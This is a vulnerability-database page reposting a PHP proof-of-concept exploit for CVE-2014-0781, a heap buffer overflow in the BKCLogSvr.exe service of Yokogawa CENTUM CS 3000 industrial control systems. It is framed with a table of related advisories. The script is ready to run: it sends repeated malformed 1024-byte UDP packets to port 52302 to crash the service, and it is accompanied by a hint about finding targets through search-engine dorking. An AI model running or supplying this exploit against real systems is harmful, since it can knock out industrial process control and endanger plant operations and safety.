| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2014-0781 | 29 May 201815:50 | – | circl | |
| CVE-2014-0781 | 14 Mar 201410:00 | – | cve | |
| CVE-2014-0781 Yokogawa CENTUM CS 3000 Heap-based Buffer Overflow | 14 Mar 201410:00 | – | cvelist | |
| EUVD-2014-0812 | 7 Oct 202500:30 | – | euvd | |
| Yokogawa Multiple Products Vulnerabilities | 13 Feb 201407:00 | – | ics | |
| Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow | 10 Mar 201415:12 | – | metasploit | |
| CVE-2014-0781 | 14 Mar 201410:55 | – | nvd | |
| Yokogawa Centum Improper Restriction of Operations within the Bounds of a Memory Buffer | 8 Nov 201900:00 | – | nessus | |
| Yokogawa (CVE-2014-0781) (deprecated) | 7 Feb 202200:00 | – | nessus | |
| Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow | 31 Aug 202400:00 | – | packetstorm |
=============================================================================================================================================
| # Title : Yokogawa CENTUM CS 3000 R3.08.50 Heap Buffer Overflow vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.yokogawa.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: BKCLogSvr.exe service on Yokogawa CENTUM CS 3000 system, exploiting Heap Buffer Overflow vulnerability to cause Denial of Service (DoS) by sending malformed UDP packets.
Opens UDP connection to port 52302.
Sends malformed packets that cause buffer overflow.
Sends multiple packets to ensure attack execution.
Closes connection after sending.
(Related : https://packetstorm.news/files/id/180485/ Linked CVE numbers: CVE-2014-0781 ) .
[+] save code as poc.php.
[+] Set target : line 3
[+] PayLoad :
<?php
// إعدادات الاتصال
$target = "192.168.1.100"; // استبدل بعنوان الهدف
$port = 52302;
$rlimit = 10; // عدد الحزم التي سيتم إرسالها
if ($rlimit < 2) {
die("يجب إرسال حزمتين متتاليتين على الأقل لتفعيل شرط DoS.\n");
}
// إنشاء الحزمة الخبيثة
$test = pack("V", 1024); // طول الحزمة
$test .= "AAAA"; // بيانات غير معروفة
$test .= "SOURCE\x00\x00"; // المصدر
$test .= str_repeat("\x00", 8); // حشو (Padding)
$test .= str_repeat("B", 1024 - strlen($test)); // تجاوز الذاكرة
// إنشاء مقبس UDP
$socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if (!$socket) {
die("فشل إنشاء مقبس UDP: " . socket_strerror(socket_last_error()) . "\n");
}
echo "إرسال $rlimit حزم إلى $target:$port...\n";
// إرسال الحزم
for ($i = 1; $i <= $rlimit; $i++) {
echo "إرسال الحزمة $i/$rlimit...\n";
socket_sendto($socket, $test, strlen($test), 0, $target, $port);
}
// إغلاق الاتصال
socket_close($socket);
echo "تم الإرسال بنجاح!\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation